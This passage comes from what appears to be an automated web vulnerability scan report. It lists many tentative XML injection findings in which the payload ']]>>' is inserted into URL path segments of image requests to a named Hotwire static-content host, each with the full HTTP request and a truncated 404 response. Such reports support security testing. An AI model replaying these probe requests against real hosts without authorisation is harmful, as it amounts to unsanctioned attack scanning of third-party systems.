GET /static/images]]>>/global/background/sidebar-module-left-side.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:58 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.79. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-left-side.gif [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-left-side.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global]]>>/background/sidebar-module-left-side.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535976
Date: Mon, 03 Oct 2011 01:02:01 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.80. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-left-side.gif [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-left-side.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/background]]>>/sidebar-module-left-side.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:05 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.81. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-left-side.gif [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-left-side.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/background/sidebar-module-left-side.gif]]>>?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:09 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.82. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-right-side.gif [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-right-side.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/global/background/sidebar-module-right-side.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:56 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.83. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-right-side.gif [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-right-side.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/global/background/sidebar-module-right-side.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:59 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.84. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-right-side.gif [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-right-side.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global]]>>/background/sidebar-module-right-side.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535950
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.85. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-right-side.gif [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-right-side.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/background]]>>/sidebar-module-right-side.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:09 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.86. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-right-side.gif [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-right-side.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/background/sidebar-module-right-side.gif]]>>?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:12 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.87. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-and-left-corner.gif [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-title-module-top-and-left-corner.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/global/background/sidebar-title-module-top-and-left-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:56 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.88. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-and-left-corner.gif [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-title-module-top-and-left-corner.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/global/background/sidebar-title-module-top-and-left-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535993
Date: Mon, 03 Oct 2011 01:02:00 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.89. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-and-left-corner.gif [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-title-module-top-and-left-corner.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global]]>>/background/sidebar-title-module-top-and-left-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.90. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-and-left-corner.gif [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-title-module-top-and-left-corner.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/background]]>>/sidebar-title-module-top-and-left-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:09 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.91. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-and-left-corner.gif [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-title-module-top-and-left-corner.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/background/sidebar-title-module-top-and-left-corner.gif]]>>?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:14 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.92. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-right-corner.gif [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-title-module-top-right-corner.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/global/background/sidebar-title-module-top-right-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:55 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.93. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-right-corner.gif [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-title-module-top-right-corner.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/global/background/sidebar-title-module-top-right-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:57 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.94. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-right-corner.gif [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-title-module-top-right-corner.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global]]>>/background/sidebar-title-module-top-right-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:59 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.95. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-right-corner.gif [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-title-module-top-right-corner.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

